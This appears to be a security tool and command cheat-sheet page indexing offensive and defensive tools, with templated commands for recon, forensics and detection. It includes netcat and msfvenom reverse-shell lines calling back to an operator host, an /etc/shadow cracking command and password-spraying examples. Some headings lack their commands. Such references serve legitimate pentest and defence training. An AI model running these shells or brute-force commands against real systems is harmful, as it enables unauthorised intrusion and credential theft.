Unified playbook
Command & defend from one vault
Flip between red and blue views to grab battle-tested commands in seconds.
0 tools indexed across red, blue, and purple workflows.
Tip: try 'reverse shell', 'zeek', or 'sysmon'.
Cobalt Strike
Commercial adversary simulation platform with beacon payloads and rich post-exploitation workflows.
Official website: cobaltstrike.com
Sliver C2
Open-source cross-platform command and control framework maintained by Bishop Fox.
Official website: sliver.sh
Empire
PowerShell and Python agent framework for post-exploitation with extensive module support.
Official website: github.com/BC-SECURITY/Empire
Havoc
Modern, configurable C2 platform with operator tooling for red team operations.
Official website: github.com/HavocFramework/Havoc
Nishang
Collection of offensive PowerShell scripts for initial access, privilege escalation, and persistence.
Official website: github.com/samratashok/nishang
CrackMapExec
Swiss-army knife for network exploitation of SMB, RDP, WinRM, LDAP, and more.
Official website: github.com/Porchetta-Industries/CrackMapExec
Responder
LLMNR, NBT-NS, and MDNS poisoner for capturing credentials and relaying authentication.
Official website: github.com/lgandx/Responder
Impacket
Python tooling for crafting and abusing network protocols such as SMB, Kerberos, and RPC.
Official website: github.com/fortra/impacket
Mimikatz
Credential dumping toolkit for extracting passwords, hashes, and Kerberos tickets.
Official website: github.com/gentilkiwi/mimikatz
Evil-WinRM
Interactive WinRM shell for offensive operators targeting Windows environments.
Official website: github.com/Hackplayers/evil-winrm
Rubeus
Kerberos abuse toolkit covering TGT harvesting, ticket requests, and ticket manipulation.
Official website: github.com/GhostPack/Rubeus
BloodHound
Graph-based analysis of Active Directory relationships to find privilege escalation paths.
Official website: github.com/BloodHoundAD/BloodHound
SharpHound
Data collector for BloodHound used to map Active Directory objects and edges.
Official website: github.com/BloodHoundAD/SharpHound
Kerberoasting
Technique to request service tickets (TGS) and crack their hashes offline to recover service credentials.
Reference tool: Impacket GetUserSPNs
Covenant
.NET-based C2 framework supporting HTTP, SMB, and custom listener profiles.
Official website: github.com/cobbr/Covenant
Pupy
Cross-platform post-exploitation remote administration tool with memory-resident payloads.
Official website: github.com/n1nj4sec/pupy
Veil Framework
Payload generation and AV-evasion framework for bypassing signature-based detection.
Official website: github.com/Veil-Framework/Veil
Bettercap
Network reconnaissance, MITM, and protocol manipulation toolkit with automation.
Official website: bettercap.org
BeEF
Browser exploitation framework for targeting web clients via hooked browsers.
Official website: beefproject.com
Social Engineer Toolkit
Collection of pre-built social engineering attacks and payloads by TrustedSec.
Official website: github.com/trustedsec/social-engineer-toolkit
SpoofApp
Caller ID spoofing application used for vishing simulations and social engineering.
Official website: spoofapp.com
SpoofCard
Service for spoofing caller ID, voice changing, and recording during engagements.
Official website: spoofcard.com
Asterisk
Open-source PBX used to build custom vishing labs, IVR testing, and call relays.
Official website: asterisk.org
socat
Versatile relay utility for port forwarding, reverse shells, and encrypted tunnels.
Official website: dest-unreach.org/socat
Proxychains
Tool to force TCP connections through proxy chains (SOCKS/HTTP) for pivoting.
Official website: github.com/haad/proxychains
DNSCat2
Command-and-control over DNS for covert channels and restricted environments.
Official website: github.com/iagox86/dnscat2
TrevorC2
Covert HTTP command and control using legitimate-looking web requests.
Official website: github.com/trustedsec/trevorc2
Twittor
Twitter-based command and control channel using direct messages for tasking.
Official website: github.com/PaulSec/twittor
DropboxC2
C2 framework leveraging Dropbox API as a dead-drop filesystem for payloads and tasks.
Official website: github.com/Arno0x/DropboxC2C
wsc2
WebSocket-based C2 channel for stealthy bidirectional control over HTTP(S).
Official website: github.com/Arno0x/WSC2
WMImplant
WMI-based post-exploitation implant enabling remote command execution via WMI events.
Official website: github.com/FortyNorthSecurity/WMImplant
DNS tunneling
Tunneling technique using DNS queries for data exfiltration (iodine/dnscat2-style).
Reference: iodine on Kali
NTP tunneling
Covert channel embedding data in NTP traffic to bypass egress controls.
Reference: NTP tunneling research
RDP
Microsoft Remote Desktop Protocol for graphical remote access to Windows systems.
Official website: RDP client docs
Apple Remote Desktop
macOS remote management service for administering and viewing Apple endpoints.
Official website: support.apple.com/remote-desktop
VNC
Platform-agnostic remote desktop protocol using RFB for screen sharing and control.
Official website: realvnc.com
X server forwarding
SSH X11 forwarding to run remote GUI applications locally through encrypted channels.
Official website: ssh.com/academy/ssh/x11-forwarding
Wireshark
GUI packet analyzer for deep inspection of hundreds of network protocols.
Official website: wireshark.org
Zeek (Bro)
Network security monitoring framework producing rich protocol logs for detection.
Official website: zeek.org
Suricata
Open-source intrusion detection and prevention engine with high-performance packet capture.
Official website: suricata.io
Security Onion
Linux distribution for network security monitoring, log management, and threat hunting.
Official website: securityonion.net
OSQuery
Endpoint telemetry framework exposing system state via SQL-like queries.
Official website: osquery.io
GRR Rapid Response
Remote live forensics platform for incident responders to collect and analyze artifacts.
Official website: github.com/google/grr
Cuckoo Sandbox
Automated malware analysis system supporting Windows, Linux, macOS, and Android samples.
Official website: cuckoosandbox.org
Logstash
Elastic stack data pipeline for ingesting and transforming event logs.
Official website: elastic.co/logstash
Kibana
Visualization and dashboard layer for Elasticsearch data and threat hunting.
Official website: elastic.co/kibana
Elasticsearch
Distributed search and analytics engine powering log indexing and SIEM pipelines.
Official website: elastic.co/elasticsearch
Wazuh
Open-source SIEM and XDR platform built on OSSEC with centralized policy management.
Official website: wazuh.com
Graylog
Centralized log management and analytics platform with alerting and dashboards.
Official website: graylog.org
MISP
Threat intelligence sharing platform for managing IOCs and correlation rules.
Official website: misp-project.org
YARA
Pattern matching engine used to create signatures for malware and file triage.
Official website: virustotal.github.io/yara
Sigma
Generic SIEM detection rule format with community-driven analytics.
Official website: github.com/SigmaHQ/sigma
Atomic Red Team
Collection of atomic tests mapped to MITRE ATT&CK for validating detections.
Official website: github.com/redcanaryco/atomic-red-team
Invoke-AtomicRedTeam
PowerShell harness to execute Atomic Red Team tests quickly on Windows endpoints.
Official website: github.com/redcanaryco/invoke-atomicredteam
CALDERA
MITRE's automated adversary emulation platform with pluggable agents and operations.
Official website: caldera.mitre.org
Prelude Operator
Continuous validation platform automating ATT&CK-aligned adversary behaviors.
Official website: prelude.org/product/operator
Red Canary Simulator
Scenario-driven emulation playbooks for testing detection coverage.
Official website: github.com/redcanaryco/red-team-simulator
AttackIQ
Continuous security validation platform delivering automated attack scenarios.
Official website: attackiq.com
Infection Monkey
Self-propagating attack simulator for testing lateral movement and segmentation.
Official website: github.com/guardicore/monkey
PurpleSharp
.NET adversary emulation tool executing encoded ATT&CK techniques in Active Directory.
Official website: github.com/mvelazc0/PurpleSharp
MITRE ATT&CK Navigator
Visualization tool for ATT&CK matrices to plan coverage and share heatmaps.
Official website: mitre-attack.github.io/attack-navigator
MITRE Engage
Framework for planning and evaluating active defense and adversary engagement strategies.
Official website: engage.mitre.org
Maltego
Graph analytics platform for link analysis, OSINT enrichment, and investigations.
Official website: maltego.com
Recon-ng
Modular web reconnaissance framework with workspace and data store support.
Official website: github.com/lanmaster53/recon-ng
theHarvester
Email, subdomain, and host harvesting tool pulling data from public sources.
Official website: github.com/laramies/theHarvester
SpiderFoot
Automated OSINT collection with more than 200 modules for infrastructure discovery.
Official website: github.com/smicallef/spiderfoot
Shodan
Search engine indexing internet-connected systems and services for exposure analysis.
Official website: shodan.io
Censys
Internet-wide scanning platform offering structured host and certificate data.
Official website: censys.io
Amass
Subnet and DNS enumeration toolkit for mapping external attack surfaces.
Official website: github.com/owasp-amass/amass
Sublist3r
Fast subdomain enumeration utility leveraging multiple data sources.
Official website: github.com/aboul3la/Sublist3r
Assetfinder
Command-line asset discovery tool aggregating subdomains and external identifiers.
Official website: github.com/tomnomnom/assetfinder
Aquatone
Aggregates screenshots and headers of discovered subdomains for visual reconnaissance.
Official website: github.com/michenriksen/aquatone
DNSRecon
DNS enumeration toolkit covering brute force, zone transfers, cache snooping, and record collection.
Install (Linux)
sudo apt update && sudo apt install dnsrecon -y
Common commands
dnsrecon -d {{target}}
dnsrecon -d {{target}} -t axfr
Official website: github.com/darkoperator/dnsrecon
dig
DNS query utility for record lookups, custom resolvers, and diagnostics.
Install (Linux)
sudo apt update && sudo apt install dnsutils -y
Common commands
dig {{target}} any
dig {{target}} A +short
Official website: bind.isc.org
whois
WHOIS client for querying domain and registration records from registrars.
Install (Linux)
sudo apt update && sudo apt install whois -y
Common commands
whois {{target}}
whois -h whois.arin.net {{target}}
Official website: iana.org/whois
host
Simple DNS lookup utility for querying records, PTR lookups, and zone testing.
Install (Linux)
sudo apt update && sudo apt install bind9-host -y
Common commands
host {{target}}
host -t txt {{target}}
Official website: bind.isc.org
crt.sh
Certificate Transparency search to uncover issued TLS certificates and hidden subdomains.
API query
curl -s "https://crt.sh/?q={{target}}&output=json"
Export domains only
curl -s "https://crt.sh/?q={{target}}&output=json" | jq -r '.[].name_value' | sort -u
Official website: crt.sh
Wayback Machine
Archive search to recover historical URLs and parameters for target domains.
Fetch archived URLs
curl "https://web.archive.org/cdx/search/cdx?url={{target}}/*&output=text"
Filter for paths
curl "https://web.archive.org/cdx/search/cdx?url={{target}}/*&output=text&fl=original&filter=statuscode:200"
Official website: web.archive.org
Google Hacking Database
Curated Google dorks to uncover exposed admin panels, backups, and sensitive files.
Example dorks
site:{{target}} inurl:admin
site:{{target}} filetype:bak OR filetype:sql
Official website: exploit-db.com/google-hacking-database
h8mail
Credential breach hunting tool supporting local breach corpora and online APIs.
Install (Linux)
pip3 install --user h8mail
Common commands
h8mail -t {{target}}
h8mail -t {{target}} -bc ./breaches.txt -k "API_KEY"
Official website: github.com/khast3x/h8mail
WhatBreach
Python utility to check email addresses against public breach datasets.
Install (Linux)
pip3 install --user whatbreach
Common commands
whatbreach -t {{target}}
Official website: github.com/Ekultek/WhatBreach
LeakLooker
Open database hunter that scans for exposed Elasticsearch, MongoDB, and CouchDB instances.
Run
python3 leaklooker.py --help
Targeted search
python3 leaklooker.py --keyword {{target}} --limit 50
Official website: github.com/woj-ciech/LeakLooker
Scavenger
Leak discovery script that hunts for exposed credentials in GitHub, Pastebin, and common dumps.
Run
python3 scavenger.py --help
Common commands
python3 scavenger.py -d {{target}} -o findings.txt
Official website: github.com/rndinfosecguy/Scavenger
PwnDB
CLI wrapper for querying breach aggregation services for compromised credentials.
Run
python3 pwndb.py --help
Common commands
python3 pwndb.py --target {{target}}
Official website: github.com/davidtavarez/pwndb
exiftool
Metadata parser for images, documents, and binaries to extract creator and location details.
Install (Linux)
sudo apt update && sudo apt install libimage-exiftool-perl -y
Common commands
exiftool {{file}}
exiftool -gps* {{file}}
Official website: exiftool.org
FOCA
Metadata analysis suite for harvesting hidden information from public documents.
Usage
FOCA.exe
Automated scan
Search domain & download docs → metadata report
Official website: elevenpaths.com/labstools/foca
metagoofil
Metadata harvester that downloads public docs and extracts usernames, paths, and tech.
Install (Linux)
pip3 install --user metagoofil
Common commands
metagoofil -d {{target}} -t pdf,doc -n 25 -o loot
metagoofil -d {{target}} -t xls,ppt -n 50 -o findings
Official website: github.com/laramies/metagoofil
enum4linux
SMB enumeration script for users, shares, policies, and RID cycling.
Install (Linux)
sudo apt update && sudo apt install enum4linux -y
Common commands
enum4linux -a {{target}}
enum4linux -u guest -p '' -S {{target}}
Official website: github.com/CiscoCXSecurity/enum4linux
Burp Suite
Integrated platform for web application security testing with intercepting proxy.
Official website: portswigger.net/burp
OWASP ZAP
Open-source web vulnerability scanner with automated and manual testing modes.
Official website: zaproxy.org
DirBuster
Classic directory brute-forcing tool for enumerating hidden web paths.
Official website: sourceforge.net/projects/dirbuster
DirSearch
Command-line directory brute forcer supporting recursion, extensions, and filters.
Official website: github.com/maurosoria/dirsearch
Nikto
Web server vulnerability scanner detecting outdated software and misconfigurations.
Official website: cirt.net/Nikto2
wfuzz
Flexible web fuzzing tool for discovery of parameters, endpoints, and vulnerabilities.
Official website: github.com/xmendez/wfuzz
Commix
Automated command injection exploitation tool for web applications.
Official website: github.com/commixproject/commix
XSStrike
XSS discovery and exploitation suite with intelligent payload generation.
Official website: github.com/s0md3v/XSStrike
w3af
Web application attack and audit framework with extensible plugin system.
Official website: github.com/andresriancho/w3af
Wapiti
Black-box web vulnerability scanner with support for authenticated scans.
Official website: github.com/wapiti-scanner/wapiti
Brakeman
Static analysis security scanner for Ruby on Rails applications.
Official website: brakemanscanner.org
Scout Suite
Multi-cloud security auditing tool for AWS, Azure, and GCP configurations.
Official website: github.com/nccgroup/ScoutSuite
CloudBrute
Fast cloud asset discovery tool for AWS, Azure, and GCP subdomains and buckets.
Official website: github.com/0xsha/CloudBrute
Pacu
Modular AWS exploitation framework for post-exploitation and privilege escalation.
Official website: github.com/RhinoSecurityLabs/pacu
Cloud Custodian
Policy-as-code engine to enforce governance and remediation across cloud providers.
Official website: cloudcustodian.io
Masscan
Extremely fast TCP port scanner capable of sweeping the internet.
Official website: github.com/robertdavidgraham/masscan
Angry IP Scanner
Cross-platform IP and port scanner for quick network discovery.
Official website: angryip.org
Hping3
Packet crafting tool for firewall testing, port scanning, and network research.
Official website: github.com/antirez/hping
Scapy
Interactive Python packet manipulation library for sniffing, crafting, and fuzzing.
Official website: scapy.net
Tcpdump
Command-line packet capture utility leveraging libpcap for in-depth analysis.
Official website: tcpdump.org
Ettercap
Comprehensive suite for man-in-the-middle attacks on LAN with sniffing and injection.
Official website: ettercap-project.org
Dsniff
Collection of tools for network auditing, sniffing, and credential harvesting.
Official website: monkey.org/~dugsong/dsniff
Yersinia
Layer 2 attack framework including rogue DHCP server, STP attacks, and ARP manipulation.
Official website: github.com/tomac/yersinia
Zenmap
GUI for Nmap enabling profile-based host and service scanning.
Official website: nmap.org/zenmap
Nessus
Enterprise vulnerability scanner with rich plugin ecosystem and compliance checks.
Official website: tenable.com/products/nessus
Nexpose / InsightVM
Vulnerability management platform from Rapid7 for authenticated and agent-based scans.
Official website: rapid7.com/products/insightvm
Qualys Vulnerability Management
Cloud-based vulnerability scanning and compliance assessment platform.
Official website: qualys.com/products/vulnerability-management
OpenSCAP scanners
Security content automation protocol toolkit for compliance checks and remediation guides.
Official website: open-scap.org
Hashcat
GPU-accelerated password cracking framework supporting hundreds of hash modes.
Official website: hashcat.net/hashcat
Medusa
Threaded login brute-force tool supporting numerous network services.
Official website: github.com/jmk-foofus/medusa
Cewl
Custom wordlist generator that scrapes target websites for candidate terms.
Official website: github.com/digininja/CeWL
Crunch
Wordlist generation utility for creating permutations with custom character sets.
Official website: sourceforge.net/projects/crunch-wordlist
SecLists
Comprehensive collection of wordlists for discovery, fuzzing, and brute force attacks.
Official website: github.com/danielmiessler/SecLists
Hash-identifier
Utility for identifying hash algorithms from captured hash strings.
Official website: github.com/blackploit/hash-identifier
RainbowCrack
Rainbow table-based password cracking suite for reversing hash digests.
Official website: project-rainbowcrack.com
LaZagne
Credential recovery tool extracting stored passwords from common applications.
Official website: github.com/AlessandroZ/LaZagne
Aircrack-ng
Suite for auditing Wi-Fi networks with capture, cracking, and replay utilities.
Official website: aircrack-ng.org
Kismet
Wireless network detector, sniffer, and IDS supporting Wi-Fi, Bluetooth, and more.
Official website: kismetwireless.net
Reaver
WPS brute-forcing tool targeting Wi-Fi routers to recover WPA/WPA2 passphrases.
Official website: github.com/t6x/reaver-wps-fork-t6x
Wifite2
Automated wireless attack tool chaining capture, cracking, and credential workflows.
Official website: github.com/derv82/wifite2
Airmon-ng
Aircrack-ng utility to enable monitor mode and prepare interfaces for Wi-Fi attacks.
Official website: aircrack-ng.org
hostapd (rogue AP)
Access point service used to build rogue APs for wireless credential capture.
Official website: w1.fi/hostapd
EAPHammer
Toolkit for targeted evil twin attacks against WPA2-Enterprise networks.
Official website: github.com/s0lst1c3/eaphammer
mdk4
Wireless testing tool for deauthentication, beacon flooding, and WIDS/WIPS stress.
Official website: github.com/aircrack-ng/mdk4
Spooftooph
Bluetooth spoofing utility to change device name, class, and MAC for social engineering.
Official website: github.com/ktoday/bluez-utils
Fern WiFi Cracker
GUI wireless security auditing tool for WEP/WPA/WPA2 cracking and session hijacking.
Official website: github.com/savio-code/fern-wifi-cracker
WiGLE
Global wireless network map for discovering SSIDs, BSSIDs, and geolocation intel.
Official website: wigle.net
Bettercap (Wi-Fi mode)
Wireless attack modules for Bettercap enabling rogue APs and client spoofing.
Official website: bettercap.org
WiFi Pumpkin
Rogue access point framework for wireless phishing and credential harvesting.
Official website: github.com/P0cL4bs/WiFi-Pumpkin
Bluetooth Honeypot
Decoy Bluetooth services for detecting malicious pairing attempts and scans.
Official website: github.com/andresriancho/bluetooth-low-energy-honeypot
ZigDiggity
Toolkit for auditing Zigbee wireless networks and discovering insecure configurations.
Official website: github.com/riverloopsec/zigdiggity
rfcat
Python toolkit for interacting with CC1111 RF transceivers for wireless hacking.
Official website: github.com/atlas0fd00m/rfcat
HackRF / SDR# tools
Software-defined radio toolkit combining HackRF hardware with SDR# analysis software.
Official website: greatscottgadgets.com/hackrf
The Sleuth Kit
Command-line digital forensics suite for analyzing disk images and file systems.
Official website: sleuthkit.org/sleuthkit
OpenStego
Steganography tool for embedding data into images with optional encryption.
Official website: openstego.com
snow
Whitespace steganography utility hiding messages inside ASCII text.
Official website: darkside.com.au/snow
Coagula
Image-to-sound converter often used for audio-based steganography experiments.
Official website: hempassions.net/coagula
Sonic Visualiser
Audio analysis workstation useful for inspecting spectrogram steganography.
Official website: sonicvisualiser.org
TinEye
Reverse image search engine to find reused images, leaks, and related assets.
Official website: tineye.com
GDB
GNU Debugger for inspecting and controlling program execution on Linux and Unix.
Official website: gnu.org/software/gdb
Windows Debugger (WinDbg)
Microsoft debugger for user-mode and kernel debugging on Windows systems.
Official website: WinDbg documentation
OllyDbg
User-mode debugger for analyzing Windows binaries and malware unpacking.
Official website: ollydbg.de
Ghidra
NSA open-source reverse engineering suite with decompiler and collaborative workflows.
Official website: ghidra-sre.org
Objdump
Binutils tool for disassembling binaries and inspecting object file headers.
Official website: gnu.org/software/binutils
ADIA
Automated Digital Investigator Assistant for streamlining forensic triage.
Official website: github.com/BC-SECURITY/ADIA
CAINE
Linux distribution with a curated suite of digital forensics and incident response tools.
Official website: caine-live.net
Skadi
Forensic triage platform for endpoint evidence collection and malware hunting.
Official website: github.com/orlikoski/Skadi
PALADIN
Bootable forensic OS providing write-blocked acquisition and analysis utilities.
Official website: sumuri.com/product/paladin
SIFT Workstation
Incident response and forensic analysis Linux distribution maintained by SANS.
Official website: digital-forensics.sans.org/community/downloads
Linux Filesystem & Permissions
List directory contents with details
ls -al
Change to a specific directory
cd {{path}}
Display the current working directory
pwd
Create a new directory
mkdir {{directory}}
Remove an empty directory
rmdir {{directory}}
Create an empty file or update its timestamp
touch {{file}}
Copy a file to a new location
cp {{source}} {{destination}}
Recursively copy a directory
cp -r {{source_dir}} {{destination_dir}}
Move or rename files and directories
mv {{source}} {{destination}}
Delete a file
rm {{file}}
Force-delete a directory tree
rm -rf {{path}}
Set executable permissions (u+rwx, g+rx, o+rx)
chmod 755 {{file}}
Change file ownership
chown {{user}}:{{group}} {{path}}
Create a compressed tar archive
tar -czf {{archive}} {{directory}}
Extract a compressed tar archive
tar -xzf {{archive}}
Linux File Viewing & Search
Print file contents to the terminal
cat {{file}}
Page through a file interactively
less {{file}}
Show the first lines of a file
head -n 20 {{file}}
Follow appended lines in real time
tail -f {{file}}
Search a file for a case-insensitive match
grep -i '{{pattern}}' {{file}}
Recursively search files for a match
grep -R '{{pattern}}' {{directory}}
Find files by name in a path
find {{path}} -name '{{pattern}}'
Locate files using the system index
locate {{keyword}}
Show the full path to a command
which {{command}}
Open the manual page for a command
man {{command}}
Search man page descriptions by keyword
apropos {{keyword}}
Linux System Monitoring & Control
Report filesystem disk usage
df -h
Summarize directory sizes in the current path
du -sh *
Display system memory usage
free -h
Monitor real-time process activity
top
List top CPU-consuming processes
ps aux --sort=-%cpu | head
Terminate a process by PID
kill -9 {{pid}}
Terminate all processes matching a name
killall {{process}}
View recent shell history
history | tail
Display kernel and system information
uname -a
Linux Package & Service Management
Run a command with elevated privileges
sudo {{command}}
Refresh package repository indexes
apt update
Install available package upgrades
apt upgrade
Install a package from the repositories
apt install {{package}}
Check legacy service status
service {{service}} status
Restart a systemd service
systemctl restart {{service}}
Review recent system logs for errors
journalctl -xe
Linux Networking & Remote Access
Display network interfaces and addresses
ip addr show
Show the routing table
ip route
Send ICMP echo requests to verify reachability
ping -c 4 {{host}}
Trace the network path to a host
traceroute {{host}}
Fetch only HTTP headers for a URL
curl -I {{url}}
Download a file over HTTP or HTTPS
wget {{url}}
Securely copy a file to a remote host
scp {{file}} {{user}}@{{host}}:{{destination}}
Open a secure shell session
ssh {{user}}@{{host}}
Metasploit Framework Console (msfconsole)
Installation:
sudo apt update && sudo apt install metasploit-framework -y
Configuration:
set local IP address globaly (for every module)
setg LHOST {{local}}
set target IP address globaly (for every module)
setg RHOST {{target}}
set local port globaly (for every module)
setg LPORT {{port}}
Help and show:
Display the options of a module
show options
Display advanced options of a module
show advanced
Display available payloads
show payload
Show available commands
help
Show available sessions
sessions -l
Show credentials found so far
creds
Database commands:
Starting postgresql db
sudo systemctl start postgresql
Starting postgresql at boot
sudo systemctl enable postgresql
Creating the Metasploit db
sudo msfdb init
Common commands:
Search for modules including that keyword or CVE number
search "keyword"
Run a module
run
Interact with a session
sessions -i "session_number"
Go to the previous used module
previous
NetCat
Installation:
sudo apt update && sudo apt install netcat-openbsd -y
Start listener:
nc -lnvp {{port}}
Run on target linux system to get a reverse shell
nc -e /bin/bash {{local}} {{port}}
Run on target windows system to get a reverse shell
nc -e cmd.exe {{local}} {{port}}
NetExec
Installation:
sudo apt update && sudo apt install netexec -y
List protocol modules (e.g., SMB modules):
nxc smb -L
Spray a password list across a user list:
nxc smb {{target}} -u /path/to/users.txt -p /path/to/passwords.txt --continue-on-success
SMBClient
Installation:
sudo apt update && sudo apt install smbclient cifs-utils -y
Anonymous session (-N = no password)
smbclient //{{target}} -N
Enter interactive prompt
smbclient -L //{{target}} -U "user"
OpenVAS
Installation:
sudo apt update && sudo apt install gvm -y
sudo gvm-setup
Starts the openvas vulnscanner.
sudo gvm-setup
WPscan
Installation:
sudo apt update && sudo apt install wpscan -y
Scans a wordpress site.
wpscan -u "url"
Nikto
Installation:
sudo apt update && sudo apt install nikto -y
Scans a website for common vulns.
nikto -h "url"
searchexploit
Searches exploit-db for exploits.
searchexploit "keywoard"
Inspect exploit module
searchexploit -x "module"
Mirror / copy the module into the current directory.
searchexploit -m "module"
Kali Linux - Paths
Directory withvarious webshells
Directory withvarious useful windows binaries
SMBMAP
Installation:
sudo apt update && sudo apt install smbmap -y
Scan for vulnerabilties in a windows system.
smbmap -H {{target}}
Official website: github.com/ShawnDEvans/smbmap
Logs & Auth Artifacts (Most Useful / paths)
Core log files to pivot quickly on host activity, authentication, and session history.
Debian/Ubuntu — system-wide events.
RHEL/CentOS — system-wide events.
Debian/Ubuntu — authentication (SSH, sudo, PAM).
RHEL/CentOS — authentication (SSH, sudo, PAM).
Last login per account — detect first-time or dormant users returning.
Login history — session timeline and remote origins.
Failed logins — brute-force and password-guessing attempts.
Time & System Context
Stamp investigation start/end for correlation.
date
Confirm timezone, NTP state, and clock drift.
timedatectl
Kernel, arch, and OS build — needed for tooling/IOC compatibility.
uname -a
Users & Logins
Who is currently logged in (TTY/pts, host, time).
who
Last login per account — flags first-time or long-dormant users.
lastlog
Processes & Services
Snapshot of processes — owner, CPU/mem, full cmdline.
ps aux
Live view — spot spikes from miners or rogue jobs.
top
Scheduled tasks — common persistence locations.
cat /etc/crontab
Per-user cron — stealthy persistence.
Networking (Quick Wins)
Interfaces summary (IP/MAC/up-down) — sets network context.
ip -br a
Listening sockets with owning PIDs — modern & fast.
ss -tulnp
Processes with open network connections — ties traffic to executables.
lsof -i
Filesystem & Mounts
Mounted filesystems and options — spot unusual writeable mounts.
mount
Recently changed files — quick leads for the last 24h.
find / -mtime -1 2>/dev/null
Nmap
Installation:
sudo apt update && sudo apt install nmap -y
Host enumeraion.
nmap -sn {{target}}
Scan the version and the OS.
nmap -sV -O {{target}}
Brute force ftp connetion with a nmap script.
Replace the usernames.txt and passwords.txt with their corresponding files.
nmap --script ftp-brute --script-args userdb=usernames.txt,passwd=passwords.txt {{target}}
Scanning for vulenrabilities in windows with nmap.
Replace the usernames.txt and passwords.txt with their corresponding files.
nmap --script smb-vuln* {{target}}
If you want to save the scan in a file you can use the -oN option followed by the name of the file name.
Official website: nmap.org
John the Ripper
Installation:
sudo apt update && sudo apt install john -y
Use rockyou wordlist to brute-force Linux /etc/shadow hashes
john --wordlist=/usr/share/wordlists/rockyou.txt /etc/shadow
Official website: openwall.com/john
Hydra
Installation:
sudo apt update && sudo apt install hydra -y
Attempt SSH logins using users.txt and pass.txt
We can replace ssh with ftp
hydra -L users.txt -P pass.txt {{target}} ssh
Official website: github.com/vanhauser-thc/thc-hydra
Gobuster
Installation:
sudo apt update && sudo apt install gobuster -y
Discover hidden directories on a web server with a wordlist
gobuster dir -u https://{{target}} -w /usr/share/wordlists/raft-large-directories.txt
Official website: github.com/OJ/gobuster
ffuf
Installation:
sudo apt update && sudo apt install ffuf -y
Fuzz URL paths or parameters to find hidden endpoints
ffuf -u https://{{target}}/FUZZ -w /usr/share/wordlists/raft-large-words.txt -t 100
Official website: github.com/ffuf/ffuf
dCode: Caesar Cipher Online Encoder/Decoder
What it does:
– Sends your plaintext “HELLO” with a shift of 3 to the dCode
– Returns the encoded result “KHOOR”
Official website: dcode.fr/caesar-cipher
CyberChef: Web-Based Data “Recipe” Tool
Browser-based tool for on-the-fly encoding, decoding, encryption, hashing, and data analysis via a drag-and-drop “recipe” interface.
Official website: gchq.github.io/CyberChef
SheetCheat for Forensics (Linux)
This is originaly from TryHackMe room and you can find it here.
Download the PDF from: SheetCheat
SheetCheat for Forensics (Windows)
This is originaly from TryHackMe room and you can find it here.
Download the PDF from: SheetCheat
Upgrade Reverse Shell to Full PTY
Spawn an interactive Bash shell with proper TTY support with python3
python3 -c 'import pty; pty.spawn("/bin/bash")'
Eric Zimmerman's tools: (Windows)
Eric Zimmerman is a security researcher who has written a few tools to help perform forensic analysis on the Windows platform. These tools help the registry, file system, timeline, and many other analyses.
Download it here.
KAPE: (Windows)
Kroll Artifact Parser and Extractor (KAPE) is another beneficial tool by Eric Zimmerman. This tool automates the collection and parsing of forensic artifacts and can help create a timeline of events.
Download it here.
Autopsy: (Windows, Linux, macOS)
Autopsy is an open-source forensics platform that helps analyze data from digital media like mobile devices, hard drives, and removable drives. Various plugins for autopsy speed up the forensic process and extract and present valuable information from the raw data sources.
Download it here.
Volatility: (Windows, Linux, macOS)
Volatility is a tool that helps perform memory analysis for memory captures from both Windows and Linux Operating Systems. It is a powerful tool that can help extract valuable information from the memory of a machine under investigation.
Download it here.
Redline: (Windows)
Redline is an incident response tool developed and freely distributed by FireEye. This tool can gather forensic data from a system and help with collected forensic information.
Download it here.
Velociraptor: (Windows, Linux, macOS)
Velociraptor is an advanced endpoint-monitoring, forensics, and response platform. It is open-source but very powerful.
Download it here.
SSH: Interactive Shell & SOCKS Proxy
Default port 22
Remote shell session over SSH
ssh user@{{target}}
FTP: Connect & List Directory
Default port 21
FTP session (anonymous)
ftp {{target}}
DNS: Query A Record
Default port 53 (UDP/TCP)
Retrieve DNS A record for a domain
dig {{target}} A +short
Simple lookup via nslookup (port 53)
nslookup {{target}}
pentestmonkey/php-reverse-shell
Link for the script:
Official GitHub: github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
HTA Reverse shell
This will make msfvenom create a .hta payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST={{local}} LPORT={{port}} -f hta-psh -o shell.hta I
Host a python http server in the current dir.
Codes to create a local server
Access the server from the target machine
Find the commands that can be executed as sudo user:
Get information about the permissions of the current user:
Logs from the computer
GTFOBins
Tool where you can find different ways to privilege escalation
Official website: gtfobins.github.io
Basic scan (no WAF)
With basic filter/WAF bypass
Sysmon Quick Deploy
Download and extract Sysmon (PowerShell)
Invoke-WebRequest -Uri https://download.sysinternals.com/files/Sysmon.zip -OutFile Sysmon.zip; Expand-Archive Sysmon.zip -DestinationPath Sysmon -Force
Fetch SwiftOnSecurity baseline configuration
Invoke-WebRequest -Uri https://raw.githubusercontent.com/SwiftOnSecurity/sysmon-config/master/sysmonconfig-export.xml -OutFile sysmonconfig-export.xml
Install Sysmon with network and process telemetry
.\Sysmon64.exe -accepteula -i sysmonconfig-export.xml
Zeek Connection Log Summary
Top talkers from Zeek conn.log
cut -d' ' -f1 /opt/zeek/logs/current/conn.log | sort | uniq -c | sort -nr | head
Extract unusual services by responder port
zeek-cut id.resp_p service uid < /opt/zeek/logs/current/conn.log | sort | uniq -c | sort -nr | head -20
Splunk Suspicious Logon Hunt
Detect repeated logon failures followed by success
index=wineventlog sourcetype="WinEventLog:Security" (EventCode=4625 OR EventCode=4624) | transaction host, Account_Name maxspan=5m | search eventcount>=11 EventCode=4624
List affected accounts with recent success
stats latest(_time) as last_success by Account_Name, host | convert ctime(last_success)